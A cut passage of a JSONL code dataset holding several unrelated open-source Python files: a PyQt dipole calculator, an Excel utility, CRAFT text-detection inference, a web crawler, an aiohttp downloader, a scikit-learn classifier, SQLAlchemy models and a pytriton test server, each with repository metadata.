self.ui.EP_lineEdit.setText(str(Exact_Potential))\n\n Approx_Potential = dipole_approx(self.r, self.angle, self.charge, self.a)\n self.ui.AP_lineEdit.setText(str(Approx_Potential))\n\n Error = diff(Exact_Potential, Approx_Potential)\n self.ui.Error_lineEdit.setText(str(Error))\n\n def cal_result(self):\n '''\n Purpose : To check if all the input parameters are of correct datatypes. If there's any mistake then invoking mistakes_disp()\n otherwise invoking results_disp()\n\n Varaibles Used :\n 1. self.r = to store the distance between center of dipole and the point of observation along with it's unit\n 2. self.a = to store the distance between center of dipole and either charge along with it's unit\n 3. self.angle = to store the angle between point of observation, positive charge and center of dipole along with it's unit\n 4. self.charge = to store the value of charge along with it's unit\n 5. invalid values = to store the names of the attributes with invalid values received\n '''\n\n invalid_values = list() # Initially, there are no invalid parameters\n\n # checking if correct value is given to r\n try:\n self.r = ( float( self.ui.r_lineEdit.text()), self.ui.r_comboBox.currentText() )\n\n # Checking if entered value is not negative\n if self.r[0] <= 0:\n invalid_values.append('r')\n except ValueError:\n invalid_values.append('r')\n\n # checking if correct value is given to a\n try:\n self.a = ( float( self.ui.a_lineEdit.text() ), self.ui.a_comboBox.currentText() )\n\n # Checking if entered value is not negative\n if self.a[0] <= 0:\n invalid_values.append('a')\n except ValueError:\n invalid_values.append('a')\n\n # checking if correct value is given to angle\n try:\n self.angle = ( float( self.ui.theta_lineEdit.text() ), self.ui.theta_comboBox.currentText() )\n if self.angle[0] < 0:\n self.angle = (-self.angle[0], self.angle[1])\n except ValueError:\n invalid_values.append('Angle')\n\n # checking if correct value is given to charge\n try:\n self.charge = ( float( self.ui.q_lineEdit.text() ), self.ui.q_comboBox.currentText() )\n if not self.charge[0]:\n invalid_values.append('Charge')\n elif self.charge[0] < 0:\n self.charge = (0 - self.charge[0], self.charge[1])\n except ValueError:\n invalid_values.append('Charge')\n\n\n if len(invalid_values): # If there are some invalid values received\n self.mistakes_disp(invalid_values)\n else: # If there's no invalid value received\n self.results_disp()\n\n\n# Executing our application\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n w = myForm()\n w.show()\n sys.exit(app.exec_())", "repo_name": "Chetan-Goyal/Electric_Field_Calculator", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5326, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "mpmath.dps", "line_number": 9, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 10, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 39, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 39, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Ok", "line_number": 39, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Yes", "line_number": 42, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 42, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 131, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 131, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 134, "usage_type": "call"}]} +{"seq_id": "26001617616", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport xlrd\nimport xlwt\nfrom xlutils.copy import copy\n\n\nclass OperationExcel:\n \"\"\"操作excel\"\"\"\n\n def __init__(self, file_path=None, sheet_name=None):\n if file_path:\n self.file_path = file_path\n self.sheet_name = sheet_name\n else:\n self.file_path = \"E:\\\\PyProject\\\\Hardware_Devices_Interface\\\\case1.xls\"\n self.sheet_name = 'Sheet1'\n self.data = self.get_data()\n\n def get_data(self):\n \"\"\"\n 获取sheets的内容\n :return:\n \"\"\"\n data = xlrd.open_workbook(self.file_path)\n table = data.sheet_by_name(self.sheet_name)\n return table\n\n def get_max_rows(self):\n \"\"\"\n 获取单元格行数\n :return:\n \"\"\"\n return self.data.nrows\n\n def get_max_cols(self):\n \"\"\"\n 获取单元格列数\n :return:\n \"\"\"\n return self.data.ncols\n\n def get_cell_value(self, row, col):\n \"\"\"\n 获取单元格数据\n :param row: 行\n :param col: 列\n :return:\n \"\"\"\n return self.data.cell_value(row, col)\n\n def get_cell_type(self, row, col):\n \"\"\"\n 获取单元格数据的类型\n :param row: 行\n :param col: 列\n :return:\n \"\"\"\n # 0:空内容 1:字符集 2:数字 3:日期 4:布尔 5:错误\n return self.data.cell_type(row, col)\n\n def get_row_value(self, row):\n \"\"\"\n 获取某一行的内容\n :param row:行号\n :return:\n \"\"\"\n return self.data.row_values(row)\n\n def get_col_data(self, col):\n \"\"\"\n 获取某一列的内容\n :param col:列号\n :return:\n \"\"\"\n return self.data.col_values(col)\n\n def write_value(self, row, col, value):\n \"\"\"\n 回写数据到excel\n :param row:行\n :param col:列\n :param value:值\n :return:\n \"\"\"\n # read_data = xlrd.open_workbook(self.file_path, formatting_info=True)\n read_data = xlrd.open_workbook(self.file_path)\n new_data = copy(read_data) # 将xlrd的对象转化为xlwt的对象\n table = new_data.get_sheet(self.sheet_name)\n table.write(row, col, value, self.set_style())\n new_data.save(self.file_path)\n\n @staticmethod\n def set_style(name='宋体', height=220, bold=False):\n style = xlwt.XFStyle() # 初始化样式\n\n font = xlwt.Font() # 为样式创建字体\n font.name = name # 定义具体的字体\n font.bold = bold # 定义是否加粗\n font.color = 'black' # 黑色\n # font.color_index = 4 # 定义字体颜色\n font.height = height # 定义字体大小 220就是11号字体,大概就是11*20得来的吧\n style.font = font # 最终把自定义的字体,定义到风格里面\n\n alignment = xlwt.Alignment() # 设置字体在单元格的位置\n alignment.horz = xlwt.Alignment.HORZ_CENTER # 水平方向 居中:HORZ_CENTER 左对齐:HORZ_LEFT 右对齐:HORZ_RIGHT\n alignment.vert = xlwt.Alignment.VERT_CENTER # 垂直方向 居中:VERT_CENTER 顶部对齐:VERT_TOP 底部对齐:VERT_BOTTOM\n style.alignment = alignment\n\n border = xlwt.Borders() # 给单元格加框线\n border.left = xlwt.Borders.THIN # 左\n border.top = xlwt.Borders.THIN # 上\n border.right = xlwt.Borders.THIN # 右\n border.bottom = xlwt.Borders.THIN # 下\n border.left_colour = 0x40 # 设置框线颜色,0x40是黑色\n border.right_colour = 0x40\n border.top_colour = 0x40\n border.bottom_colour = 0x40\n style.borders = border\n\n return style\n\n\nif __name__ == '__main__':\n opera = OperationExcel(file_path='E:\\\\case2.xlsx', sheet_name='Sheet1')\n opera.get_data()\n opera.get_cell_value(1, 1)\n opera.write_value(3, 1, 'test样式')\n opera.get_cell_type(2, 0)\n print(opera.get_max_rows())\n print(opera.get_cell_value(1, 1))\n print(opera.get_cell_type(2, 0))\n", "repo_name": "chaixin2018/unittest-demo", "sub_path": "Suite/test/excelFunction.py", "file_name": "excelFunction.py", "file_ext": "py", "file_size_in_byte": 4116, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "xlrd.open_workbook", "line_number": 25, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 87, "usage_type": "call"}, {"api_name": "xlutils.copy.copy", "line_number": 88, "usage_type": "call"}, {"api_name": "xlwt.XFStyle", "line_number": 95, "usage_type": "call"}, {"api_name": "xlwt.Font", "line_number": 97, "usage_type": "call"}, {"api_name": "xlwt.Alignment", "line_number": 105, "usage_type": "call"}, {"api_name": "xlwt.Alignment", "line_number": 106, "usage_type": "attribute"}, {"api_name": "xlwt.Alignment", "line_number": 107, "usage_type": "attribute"}, {"api_name": "xlwt.Borders", "line_number": 110, "usage_type": "call"}, {"api_name": "xlwt.Borders", "line_number": 111, "usage_type": "attribute"}, {"api_name": "xlwt.Borders", "line_number": 112, "usage_type": "attribute"}, {"api_name": "xlwt.Borders", "line_number": 113, "usage_type": "attribute"}, {"api_name": "xlwt.Borders", "line_number": 114, "usage_type": "attribute"}]} +{"seq_id": "3695217696", "text": "import os \nimport torch \nimport numpy as np\nfrom collections import OrderedDict\nimport cv2 \nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\n\nfrom .craft import CRAFT\nfrom . import imgproc\nfrom . import craft_utils\n\ndef crop_text(img, save_name, pts):\n pts_ = pts.reshape(-1, 2).astype(int)\n\n rect = cv2.boundingRect(pts_)\n x,y,w,h = rect\n croped = img[y:y+h, x:x+w].copy()\n\n ## (2) make mask\n pts_ = pts_ - pts_.min(axis=0)\n\n mask = np.zeros(croped.shape[:2], np.uint8)\n cv2.drawContours(mask, [pts_], -1, (255, 255, 255), -1, cv2.LINE_AA)\n\n ## (3) do bit-op\n dst = cv2.bitwise_and(croped, croped, mask=mask)\n\n ## (4) add the white background\n bg = np.ones_like(croped, np.uint8)*255\n cv2.bitwise_not(bg,bg, mask=mask)\n dst2 = bg+ dst\n\n cv2.imwrite(save_name, dst2)\n\ndef copyStateDict(state_dict):\n if list(state_dict.keys())[0].startswith(\"module\"):\n start_idx = 1\n else:\n start_idx = 0\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n name = \".\".join(k.split(\".\")[start_idx:])\n new_state_dict[name] = v\n return new_state_dict\n\ndef extract_wordbox(net, image):\n text_threshold = 0.7\n link_threshold = 0.4\n low_text = 0.4\n # resize\n img_resized, target_ratio, size_heatmap = imgproc.resize_aspect_ratio(image, 1280, interpolation=cv2.INTER_LINEAR, mag_ratio=1.5)\n ratio_h = ratio_w = 1 / target_ratio\n\n # preprocessing\n x = imgproc.normalizeMeanVariance(img_resized)\n x = torch.from_numpy(x).permute(2, 0, 1) # [h, w, c] to [c, h, w]\n x = Variable(x.unsqueeze(0)) # [c, h, w] to [b, c, h, w]\n\n x = x.cuda()\n\n # forward pass\n with torch.no_grad():\n y, feature = net(x)\n\n # make score and link map\n score_text = y[0,:,:,0].cpu().data.numpy()\n score_link = y[0,:,:,1].cpu().data.numpy()\n\n # Post-processing\n boxes, polys = craft_utils.getDetBoxes(score_text, score_link, text_threshold, link_threshold, low_text, False)\n\n # coordinate adjustment\n boxes = craft_utils.adjustResultCoordinates(boxes, ratio_w, ratio_h)\n if boxes != []:\n boxes[np.where(boxes < 0)] = 0\n boxes = expand_box(boxes)\n \n return boxes\n\ndef expand_box(boxes):\n new_boxes = []\n for box in boxes:\n rrect = cv2.minAreaRect(box)\n temp = (rrect[1][0], rrect[1][1])\n if temp[0] 10 and w > 10:\n # crop = img.copy()[y:y+h, x:x+w, :]\n # cv2.imwrite(os.path.join('res_img', img_file[:-4]+'_'+str(count)+'.jpg'), crop)\n save_name = os.path.join(save_folder, str(count)+'.jpg')\n crop_text(img, save_name, poly)", "repo_name": "duongduc2908/Freelance_DaNang", "sub_path": "textSpotting/CRAFTpytorch/inference.py", "file_name": "inference.py", "file_ext": "py", "file_size_in_byte": 3511, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "cv2.boundingRect", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.bitwise_and", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.bitwise_not", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 34, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 52, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.minAreaRect", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.boxPoints", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 90, "usage_type": "call"}, {"api_name": "craft.CRAFT", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn.DataParallel", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 100, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 100, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}]} +{"seq_id": "12383567939", "text": "import aiohttp\nfrom aiohttp import ClientTimeout\n\nfrom nhm_spider.http.response import Response\nfrom nhm_spider.common.log import get_logger\n\n\nclass Downloader:\n def __init__(self, spider):\n self.logger = get_logger(self.__class__.__name__)\n self.session = None\n self.spider = spider\n self.__headers = None\n self.__timeout = None\n self.__clear_cookie = None\n self.__use_session = None\n self.__opened = False\n\n async def open_downloader(self):\n async def on_request_start(session, trace_config_ctx, params):\n # print(\"Starting request\")\n pass\n\n async def on_request_end(session, trace_config_ctx, params):\n # print(\"Ending request\")\n pass\n\n self.__headers = self.spider.settings.get_dict(\"DEFAULT_REQUEST_HEADER\")\n request_timeout = self.spider.settings.get_int(\"REQUEST_TIMEOUT\", 180)\n self.__timeout = ClientTimeout(total=request_timeout)\n self.__clear_cookie = self.spider.settings.get_bool(\"CLEAR_COOKIE\", False)\n self.__use_session = self.spider.settings.get_bool(\"USE_SESSION\", True)\n\n trace_config = aiohttp.TraceConfig()\n trace_config.on_request_start.append(on_request_start)\n trace_config.on_request_end.append(on_request_end)\n\n self.session = aiohttp.ClientSession(headers=self.__headers, timeout=self.__timeout,\n trace_configs=[trace_config])\n self.__opened = True\n\n def close_downloader(self):\n self.__opened = False\n\n @property\n def is_opened(self):\n return self.__opened\n\n async def send_request(self, request):\n try:\n # 每次请求前清除session缓存的cookies 为response set-cookie中自动缓存的\n if self.__clear_cookie is True:\n self.session.cookie_jar.clear()\n # 是否每次创建新session请求\n if self.__use_session is False:\n session = aiohttp.ClientSession(headers=self.__headers, timeout=self.__timeout)\n response = await self.send(session, request)\n await session.close()\n else:\n response = await self.send(self.session, request)\n if response is None:\n return\n # 获取完text之后,会自动关闭response。\n text = await response.text() # TimeoutError\n except Exception as exception:\n return exception\n my_response = Response(request.url, request, text, response, response.status, response.headers)\n return my_response\n\n async def send(self, session, request):\n \"\"\" 处理不同method的请求参数 \"\"\"\n if request.method.lower() == \"get\":\n response = await session.get(request.url, data=request.body, headers=request.headers,\n cookies=request.cookies, proxy=request.proxy)\n elif request.method.lower() == \"post\":\n response = await session.post(request.url, data=request.form, headers=request.headers,\n cookies=request.cookies, proxy=request.proxy)\n else:\n self.logger.error(\"传入不支持的方法。\")\n response = None\n return response\n", "repo_name": "noHairMan/nhm-spider", "sub_path": "nhm_spider/core/downloader.py", "file_name": "downloader.py", "file_ext": "py", "file_size_in_byte": 3323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "nhm_spider.common.log.get_logger", "line_number": 10, "usage_type": "call"}, {"api_name": "aiohttp.ClientTimeout", "line_number": 30, "usage_type": "call"}, {"api_name": "aiohttp.TraceConfig", "line_number": 34, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 38, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 56, "usage_type": "call"}, {"api_name": "nhm_spider.http.response.Response", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "34782934376", "text": "import numpy as np\n\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\n\n\ndef main():\n # Limiting the categories loaded\n # categories = ['alt.atheism', 'soc.religion.christian',\n # 'comp.graphics', 'sci.med']\n\n twenty_train = fetch_20newsgroups(\n subset='train', shuffle=True)\n # twenty_train = fetch_20newsgroups(\n # subset='train', categories=categories, shuffle=True)\n\n # All target target name\n # print(twenty_train.target_names)\n\n # print(\"\\n\".join(twenty_train.data[0].split(\"\\n\")[:3]))\n\n # First data and its target value\n # print(twenty_train.data[0])\n # print(twenty_train.target_names[twenty_train.target[0]])\n\n text_clf = Pipeline([('vect', CountVectorizer(stop_words='english')),\n ('tfidf', TfidfTransformer()),\n ('clf', MultinomialNB()),\n ])\n\n text_clf = text_clf.fit(twenty_train.data, twenty_train.target)\n\n twenty_test = fetch_20newsgroups(subset='test', shuffle=True)\n # twenty_test = fetch_20newsgroups(subset='test', categories=categories, shuffle=True)\n predicted = text_clf.predict(twenty_test.data)\n mean = np.mean(predicted == twenty_test.target)\n\n print(mean)\n\n docs_new = ['God is love', 'Spread the hate, cause the goverment is bad',\n 'George bush is my neighbor']\n\n predicted = text_clf.predict(docs_new)\n\n for doc, category in zip(docs_new, predicted):\n print('%r => %s' % (doc, twenty_train.target_names[category]))\n\n parameters = {'vect__ngram_range': [(1, 1), (1, 2)],\n 'tfidf__use_idf': (True, False),\n 'clf__alpha': (1e-2, 1e-3),\n }\n\n gs_clf = GridSearchCV(text_clf, parameters, n_jobs=-1)\n gs_clf = gs_clf.fit(twenty_train.data, twenty_train.target)\n\n print(gs_clf.best_score_)\n print(gs_clf.best_params_)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "darcien/ML", "sub_path": "text-classification-attempt/multinomialNB-classify-pipeline.py", "file_name": "multinomialNB-classify-pipeline.py", "file_ext": "py", "file_size_in_byte": 2182, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "sklearn.datasets.fetch_20newsgroups", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfTransformer", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.datasets.fetch_20newsgroups", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "42286355701", "text": "from urllib.parse import urlparse, urljoin\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nclass Page:\n\n def __init__(self, address):\n self.url = urlparse(address)\n self.address = address\n self.page_rank = 0\n self.links = {}\n self.text = ''\n try:\n page = requests.get(self.url.geturl()).text\n soup = BeautifulSoup(page, \"html.parser\")\n self.links = {a['href'] for a in soup.find_all('a', href=True)}\n self.text = soup.text\n self._parse_urls()\n except Exception:\n raise ConnectionError()\n\n def __str__(self):\n return \"{}: {:.3f}\".format(self.address, self.page_rank)\n\n def __eq__(self, other):\n return self.address == other.address\n\n def __hash__(self):\n return hash(self.address)\n\n def _parse_urls(self):\n external_links = []\n for link in self.links:\n external_url = urlparse(link)\n if not external_url.netloc:\n external_links.append(urlparse(urljoin(self.url.geturl(), external_url.path)))\n else:\n external_links.append(external_url)\n self.links = {link.geturl() for link in external_links}\n\n\nclass Crawler:\n\n def __init__(self, start_page, max_depth=1):\n self.start_page, self.max_depth = start_page, max_depth\n self.web = {start_page}\n\n def crawl_page(self, page, depth):\n if depth >= self.max_depth:\n return\n print(\"{} : {}\".format(depth, page.address))\n for link in page.links:\n if not self.visited(link):\n try:\n new_page = Page(link)\n self.crawl_page(new_page, depth + 1)\n self.web.add(new_page)\n except ConnectionError:\n return\n\n def visited(self, link):\n return link in [p.address for p in self.web]\n\n def crawl(self):\n self.crawl_page(self.start_page, 0)\n", "repo_name": "ColluGianluca/WAAT-2021", "sub_path": "crawler.py", "file_name": "crawler.py", "file_ext": "py", "file_size_in_byte": 1989, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "urllib.parse.urlparse", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 36, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 38, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "34208646157", "text": "from sqlalchemy import Column, Integer\nfrom sqlalchemy.ext.declarative import declared_attr\nfrom sqlalchemy.sql import text\n\nfrom .base import Base\nfrom .exceptions import NotFoundError, InvalidQueryError\n\nSession = None\n\n\nclass BaseManager(object):\n \"\"\"\n Base manager, every model will have this common manager\n that allows us to perform database common operations\n \"\"\"\n def __init__(self, model):\n self._model = model\n\n def filter_by(self, order_by='id', limit=500, offset=0, **kwargs):\n return Session.query(\n self._model\n ).filter_by(\n **kwargs\n ).order_by(order_by).limit(limit).offset(offset)\n\n def get_for_update(self, **kwargs):\n \"\"\"\n http://docs.sqlalchemy.org/en/latest/orm/query.html?highlight=update#sqlalchemy.orm.query.Query.with_for_update # noqa\n \"\"\"\n if not kwargs:\n raise InvalidQueryError(\n \"Can not execute a query without parameters\")\n obj = Session.query(\n self._model).with_for_update(\n nowait=True, of=self._model).filter_by(**kwargs).first()\n if not obj:\n raise NotFoundError('Object not found')\n return obj\n\n def get(self, **kwargs):\n if not kwargs:\n raise InvalidQueryError(\n \"Can not execute a query without parameters\")\n obj = Session.query(self._model).filter_by(**kwargs).first()\n\n if not obj:\n raise NotFoundError('Object not found')\n return obj\n\n def count(self):\n result = Session.execute(\n 'SELECT count(id) from {}'.format(self._model.__table__.name)\n )\n\n r = result.fetchone()\n if len(r) > 0:\n return r[0]\n else:\n return 0\n\n def raw_sql(self, sql, **kwargs):\n return Session.execute(text(sql), kwargs)\n\n def add_all(self, data):\n return Session.add_all(data)\n\n\nclass BaseModel(Base):\n \"\"\"Abstract base model, contains common field and methods for all models\n \"\"\"\n __abstract__ = True\n\n id = Column(Integer, primary_key=True)\n\n def __init__(self, **kwargs):\n super(BaseModel, self).__init__(**kwargs)\n for name, value in kwargs.items():\n if not name.startswith('_'):\n setattr(self, name, value)\n\n @declared_attr\n def objects(cls):\n return BaseManager(cls)\n\n def update(self):\n Session.flush()\n\n def add(self):\n Session.add(self)\n Session.flush()\n\n def delete(self):\n Session.delete(self)\n Session.flush()\n", "repo_name": "Riffstation/sqlalchemypostgresutils", "sub_path": "pgsqlutils/orm.py", "file_name": "orm.py", "file_ext": "py", "file_size_in_byte": 2608, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "exceptions.InvalidQueryError", "line_number": 31, "usage_type": "call"}, {"api_name": "exceptions.NotFoundError", "line_number": 37, "usage_type": "call"}, {"api_name": "exceptions.InvalidQueryError", "line_number": 42, "usage_type": "call"}, {"api_name": "exceptions.NotFoundError", "line_number": 47, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.text", "line_number": 62, "usage_type": "call"}, {"api_name": "base.Base", "line_number": 68, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 73, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 73, "usage_type": "argument"}, {"api_name": "sqlalchemy.ext.declarative.declared_attr", "line_number": 81, "usage_type": "name"}]} +{"seq_id": "23234532981", "text": "import argparse\nimport logging\nimport random\nimport signal\nimport threading\nimport traceback\nfrom typing import Any\n\nfrom pytriton.triton import Triton, TritonConfig\nfrom tests.functional.common.models import ADD_SUB_PYTHON_MODEL\nfrom tests.utils import find_free_port\n\nLOGGER = logging.getLogger((__package__ or \"main\").split(\".\")[-1])\n\nsignal_handled = False\ncond = threading.Condition()\n\n\nclass MyTritonThread(threading.Thread):\n def __init__(self, args):\n super().__init__(daemon=True)\n self.triton_config = None\n self.exception_traceback = None\n self.triton = None\n self.args = args\n\n def run(self) -> None:\n try:\n assert self.args is not None\n assert self.args.grpc_port is not None\n assert self.args.http_port is not None\n\n self.triton_config = TritonConfig(\n grpc_port=self.args.grpc_port, http_port=self.args.http_port, metrics_port=find_free_port()\n )\n LOGGER.debug(f\"Using {self.triton_config}\")\n self.triton = Triton(config=self.triton_config)\n model_spec = ADD_SUB_PYTHON_MODEL\n LOGGER.debug(f\"Using {model_spec}\")\n self.triton.bind(\n model_name=model_spec.name,\n infer_func=model_spec.create_infer_fn(),\n inputs=model_spec.inputs,\n outputs=model_spec.outputs,\n config=model_spec.model_config,\n )\n self.triton.serve()\n\n except Exception:\n self.exception_traceback = traceback.format_exc()\n with cond:\n cond.notify()\n\n\ndef signal_handler(_signal_num: Any, _) -> None:\n with cond:\n global signal_handled\n signal_handled = True\n cond.notify()\n\n\ndef main():\n from tests.utils import DEFAULT_LOG_FORMAT\n\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\n \"--init-timeout-s\", required=False, default=300, type=float, help=\"Timeout for server and models initialization\"\n )\n parser.add_argument(\"--batch-size\", type=int, default=32, help=\"Size of single inference batch\")\n parser.add_argument(\"--seed\", type=int, help=\"PRNG seed\", required=False)\n parser.add_argument(\"--verbose\", \"-v\", action=\"store_true\", help=\"Timeout for test\")\n parser.add_argument(\"--grpc-port\", type=int, help=\"Grpc triton port\")\n parser.add_argument(\"--http-port\", type=int, help=\"Http triton port\")\n args = parser.parse_args()\n\n log_level = logging.DEBUG if args.verbose else logging.INFO\n logging.basicConfig(level=log_level, format=DEFAULT_LOG_FORMAT)\n logging.captureWarnings(True)\n LOGGER.debug(f\"CLI args: {args}\")\n\n random.seed(args.seed)\n\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\n th = MyTritonThread(args)\n th.start()\n\n with cond:\n cond.wait()\n\n assert signal_handled\n assert th.triton is not None\n th.triton.stop()\n LOGGER.info(\"Signal handled and triton server properly stopped\")\n\n assert th.exception_traceback is None, f\"Raised {th.exception_traceback}\"\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "triton-inference-server/pytriton", "sub_path": "tests/functional/L0_run_in_thread/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 3194, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 570, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "threading.Condition", "line_number": 16, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pytriton.triton.TritonConfig", "line_number": 33, "usage_type": "call"}, {"api_name": "tests.utils.find_free_port", "line_number": 34, "usage_type": "call"}, {"api_name": "pytriton.triton.Triton", "line_number": 37, "usage_type": "call"}, {"api_name": "tests.functional.common.models.ADD_SUB_PYTHON_MODEL", "line_number": 38, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 50, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 55, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 65, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 76, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 76, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 77, "usage_type": "call"}, {"api_name": "tests.utils.DEFAULT_LOG_FORMAT", "line_number": 77, "usage_type": "name"}, {"api_name": "logging.captureWarnings", "line_number": 78, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 81, "usage_type": "call"}, {"api_name": "signal.signal", "line_number": 83, "usage_type": "call"}, {"api_name": "signal.SIGINT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "signal.signal", "line_number": 84, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 84, "usage_type": "attribute"}]} +{"seq_id": "9333331155", "text": "#!/usr/bin/env python3\nimport base64\nimport urllib\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport json\nimport hashlib\nimport requests\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\nfrom PIL import Image, ImageFont, ImageDraw\n\nicons = [\"edit-cut\", \"edit-paste\", \"edit-copy\"]\n# dastools is a multi-purpose tool written in Python\n# Simply launch dastools on the command line as follows :\n# ./dastools.py\n# Enter the dimensions you want the image to be and the enter the text you want on the image and click generate.\n# An image with the filename image_generated_output.png will be generated.\n# More documentation can be found here :\n# http://confluence.knowroaming.com/display/AA/Android+%3A+Vsim+Apps+%3A+Offline+Activation+%3A+SecureVault%2C+Cromulent%2C+Kwijybo%2C+Garfield#Android:VsimApps:OfflineActivation:SecureVault,Cromulent,Kwijybo,Garfield-GarfieldGUI\n# http://www.pygtk.org/pygtk2tutorial/sec-PackingUsingTables.html\n# http://python-gtk-3-tutorial.readthedocs.io/en/latest/index.html\nclass DastoolsWindow(Gtk.Window):\n\t\"\"\"docstring for DastoolsWindow\"\"\"\n\tdef __init__(self):\n\t\tGtk.Window.__init__(self, title=\"DasTools is a GUI which provides common 